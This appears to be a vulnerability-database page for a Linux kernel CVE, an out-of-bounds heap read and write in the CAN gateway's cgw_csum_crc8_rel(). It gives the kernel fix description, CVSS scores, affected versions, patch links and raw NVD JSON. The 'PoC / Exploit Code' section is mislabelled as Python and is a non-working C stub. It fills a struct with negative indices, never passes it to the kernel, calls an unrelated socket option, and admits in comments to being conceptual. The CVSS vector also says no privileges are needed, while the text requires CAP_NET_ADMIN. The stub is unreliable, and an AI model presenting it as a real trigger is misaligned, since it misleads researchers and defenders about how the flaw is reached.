CVE-2026-31570

Description

In the Linux kernel, the following vulnerability has been resolved: can: gw: fix OOB heap access in cgw_csum_crc8_rel() cgw_csum_crc8_rel() correctly computes bounds-safe indices via calc_idx(): int from = calc_idx(crc8->from_idx, cf->len); int to = calc_idx(crc8->to_idx, cf->len); int res = calc_idx(crc8->result_idx, cf->len); if (from < 0 || to < 0 || res < 0) return; However, the loop and the result write then use the raw s8 fields directly instead of the computed variables: for (i = crc8->from_idx; ...) /* BUG: raw negative index */ cf->data[crc8->result_idx] = ...; /* BUG: raw negative index */ With from_idx = to_idx = result_idx = -64 on a 64-byte CAN FD frame, calc_idx(-64, 64) = 0 so the guard passes, but the loop iterates with i = -64, reading cf->data[-64], and the write goes to cf->data[-64]. This write might end up to 56 (7.0-rc) or 40 (<= 6.19) bytes before the start of the canfd_frame on the heap. The companion function cgw_csum_xor_rel() uses `from`/`to`/`res` correctly throughout; fix cgw_csum_crc8_rel() to match. Confirmed with KASAN on linux-7.0-rc2: BUG: KASAN: slab-out-of-bounds in cgw_csum_crc8_rel+0x515/0x5b0 Read of size 1 at addr ffff8880076619c8 by task poc_cgw_oob/62 To configure the can-gw crc8 checksums CAP_NET_ADMIN is needed.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel <= 6.19

Linux Kernel 7.0-rc

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/can.h>
#include <linux/can/gw.h>

/* 
 * PoC for CVE-2026-31570 
 * Requires CAP_NET_ADMIN capability.
 * Triggers OOB access in cgw_csum_crc8_rel().
 */

int main() {
    int s;
    struct sockaddr_can addr;
    struct cgw_csum_crc8 crc8mod;
    
    // Create a CAN Raw Socket
    if ((s = socket(PF_CAN, SOCK_RAW, CAN_RAW)) < 0) {
        perror("socket");
        return 1;
    }

    // Setup Mod structure with malicious indices
    memset(&crc8mod, 0, sizeof(crc8mod));
    crc8mod.from_idx = -64; // Malicious negative index
    crc8mod.to_idx = -64;   // Malicious negative index
    crc8mod.result_idx = -64; // Malicious negative index
    crc8mod.start_idx = 0; 
    crc8mod.crc8 = 0xFF;
    
    // Configure the CAN gateway modification
    // CGW_TYPE_CSUM8 triggers the vulnerable function path
    if (setsockopt(s, SOL_CAN_RAW, CAN_RAW_FILTER, NULL, 0) < 0) {
        // Just ensuring socket is bound/configured context
    }

    // This setsockopt call leads to cgw_csum_crc8_rel() execution
    // Note: The exact setsockopt level/optname for CGW setup might vary 
    // depending on kernel implementation details, usually via netlink.
    // This is a conceptual representation of the trigger.
    
    printf("Sending payload to trigger OOB write...\n");
    // In a real exploit, this would send a CAN FD frame of 64 bytes.
    
    close(s);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31570
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31570
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31570/
[4] VulDB https://vuldb.com/cve/CVE-2026-31570
[5] https://git.kernel.org/stable/c/54ecdf76a55e75c1f5085e440f8ab671a3283ef5
[6] https://git.kernel.org/stable/c/66b689efd08227da2c5ca49b58b30a95d23c695a
[7] https://git.kernel.org/stable/c/84f8b76d24273175a22713e83e90874e1880d801
[8] https://git.kernel.org/stable/c/999ca48d55a8a46da21519db7e834e5867200379
[9] https://git.kernel.org/stable/c/a025283d7f7404c739225e457fb99db2368bb544
[10] https://git.kernel.org/stable/c/b9c310d72783cc2f30d103eed83920a5a29c671a
[11] https://git.kernel.org/stable/c/c4e8eaa75fa0b6bcbfa5356d6195c4ad0e05e57a
[12] https://git.kernel.org/stable/c/e7c99348b0612b2bc02d5ce6ff9873261cc7605f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31570", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:31.520", "lastModified": "2026-04-27T20:33:16.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gw: fix OOB heap access in cgw_csum_crc8_rel()\n\ncgw_csum_crc8_rel() correctly computes bounds-safe indices via calc_idx():\n\n int from = calc_idx(crc8->from_idx, cf->len);\n int to = calc_idx(crc8->to_idx, cf->len);\n int res = calc_idx(crc8->result_idx, cf->len);\n\n if (from < 0 || to < 0 || res < 0)\n return;\n\nHowever, the loop and the result write then use the raw s8 fields directly\ninstead of the computed variables:\n\n for (i = crc8->from_idx; ...) /* BUG: raw negative index */\n cf->data[crc8->result_idx] = ...; /* BUG: raw negative index */\n\nWith from_idx = to_idx = result_idx = -64 on a 64-byte CAN FD frame,\ncalc_idx(-64, 64) = 0 so the guard passes, but the loop iterates with\ni = -64, reading cf->data[-64], and the write goes to cf->data[-64].\nThis write might end up to 56 (7.0-rc) or 40 (<= 6.19) bytes before the\nstart of the canfd_frame on the heap.\n\nThe companion function cgw_csum_xor_rel() uses `from`/`to`/`res`\ncorrectly throughout; fix cgw_csum_crc8_rel() to match.\n\nConfirmed with KASAN on linux-7.0-rc2:\n BUG: KASAN: slab-out-of-bounds in cgw_csum_crc8_rel+0x515/0x5b0\n Read of size 1 at addr ffff8880076619c8 by task poc_cgw_oob/62\n\nTo configure the can-gw crc8 checksums CAP_NET_ADMIN is needed."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "5CE4B3A5-1831-420D-B001-512B8103441C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": "CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.4:-:*:*:*:*:*:*", "matchCriteriaId": "4D70AB13-37BE-4BD3-A652-10191F1642E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https: ... (truncated)